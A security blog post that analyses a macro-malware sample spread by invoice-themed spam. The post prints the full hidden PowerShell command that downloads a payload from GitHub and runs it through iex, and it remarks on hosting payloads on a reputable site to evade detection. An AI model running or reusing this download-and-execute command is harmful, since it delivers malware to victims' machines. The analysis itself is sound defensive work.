Macro-Malware Connecting to GitHub

Author: No Comments Share:

Just yesterday McAfee Labs reported macro malware hiding payload in text forms. That same day we found a sample fetching its payload from GitHub.

As usual the attack starts with a spam email with the attachment named:

<organization name>’s_Overdue Invoice_(007-153315).doc

Pretty nice name, some people may actually buy this as it isn’t any generic random name like invoice_confirmation.doc – it actually contains the organization’s name.

The document has the following structure:

2016-03-08-001-doc_structure

And here is a relatively short Visual Basic macro we found inside:

2016-03-08-002-macro

 

It takes advantage of WMI Scripting Library. And the code for executing an instance of PowerShell (lines 7-13) seems to be taken straight from Windows Development Center website and then obfuscated a little bit. Here’s the command line:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/README') | iex } else {(new-object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/TODO') | iex}"

It launches PowerShell with a bunch of command line arguments for as quiet an execution as possible. E.g. “-ExecutionPolicy bypass” (when nothing is blocked and there are no warnings or prompts), no window, no loading local profiles etc.

Let’s have a better look at the actual script passed to PowerShell:

if ([IntPtr]::size -eq 4) {
    (new-object Net.WebClient).DownloadString \
        ('https://github.com/consfw/msfw/raw/master/README') | iex
} else {
    (new-object Net.WebClient).DownloadString \
        ('https://github.com/consfw/msfw/raw/master/TODO') | iex
}

 

The condition checks if it’s a 32 of 64 version of Windows. According to MSDN the property [IntPtr]::size is 4 in a 32-bit process and 8 in a 64-bit one. After that it downloads the corresponding payload. It’s downloaded using DownloadString method of WebClient class. The string downloaded is then piped with iex a.k.a. invoke-expression.

What’s interesting is that the payload was stored on GitHub. At the time of analysis, the repository has already been deleted. Internet search shows that someone has already noticed that and submitted the URLs to urlquery.

Hiding the payload on GitHub is an easy way to add a bit of stealthiness to the malware. It’s hard to say how efficient is this approach for AV/HIPS/NIDS evasion. But it’s an HTTPS connection and is made to a reputable site, so chances are it may be overlooked.

Previous Article

Leading the Cybercorns to pasture

Next Article

Angler EK – A Bromium Discussion

You may also like